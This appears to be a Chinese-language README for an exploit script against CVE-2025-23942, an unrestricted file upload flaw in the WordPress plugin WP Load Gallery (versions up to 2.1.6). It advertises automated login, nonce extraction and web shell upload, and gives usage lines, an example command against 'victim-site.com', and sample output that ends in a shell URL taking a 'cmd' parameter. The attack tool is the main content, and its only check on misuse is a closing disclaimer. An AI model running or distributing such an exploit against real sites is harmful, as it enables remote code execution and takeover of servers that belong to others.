NgocCode WP Load Gallery 中存在危险类型文件无限制上传漏洞,允许向 Web 服务器上传 Web Shell。该漏洞影响 WP Load Gallery 版本:从 n/a 至 2.1.6。
✅ 自动化利用 – 自动提取 nonce、登录并上传 Web Shell。
✅ 版本检查 – 利用前确认目标是否存在漏洞。
✅ 错误处理 – 即使在失败情况下也能确保平稳执行。
✅ 会话管理 – 使用持久化会话管理进行身份验证。
✅ 实时反馈 – 在每个步骤提供输出。
requests 模块 (pip install requests)使用必要参数运行脚本:
usage: CVE-2025-23942.py [-h] -u URL -un USERNAME -p PASSWORD
利用 WP Load Gallery - 任意文件上传
options:
-h, --help 显示此帮助信息并退出
-u URL, --url URL 目标 WordPress URL (例如 https://example.com)
-un USERNAME, --username USERNAME
WordPress 用户名
-p PASSWORD, --password PASSWORD
WordPress 密码
示例:
python CVE-2025-23942.py -u http://victim-site.com -un author_user -p password123
_______ ________ ___ ___ ___ _____ ___ ____ ___ _ _ ___
/ ____\ \ / / ____| |__ \ / _ \__ \| ____| |__ \|___ \ / _ \| || |__ \
| | \ \ / /| |__ ______ ) | | | | ) | |__ ______ ) | __) | (_) | || |_ ) |
| | \ \/ / | __|______/ /| | | |/ /|___ \______/ / |__ < \__, |__ _/ /
| |____ \ / | |____ / /_| |_| / /_ ___) | / /_ ___) | / / | |/ /_
\_____| \/ |______| |____|\___/____|____/ |____|____/ /_/ |_|____|
[+] 正在检查插件版本...
[+] 检测到版本:2.1.6
[+] 目标存在漏洞!正在继续利用...
[+] 登录成功。
[+] 正在提取 wplg_nonce...
[+] 提取 wplg_nonce:a1b2c3d4e5
[+] 正在上传 Shell...
[+] 文件上传成功!
[+] Shell 访问地址:http://victim-site.com/wp-content/uploads/2025/02/nxploit.php?cmd=id
此漏洞利用工具仅用于教育和安全研究目的。请勿在您没有所有权或未经明确许可的系统上使用。作者对任何滥用此脚本的行为不承担责任。 ( Khaled_alenazi )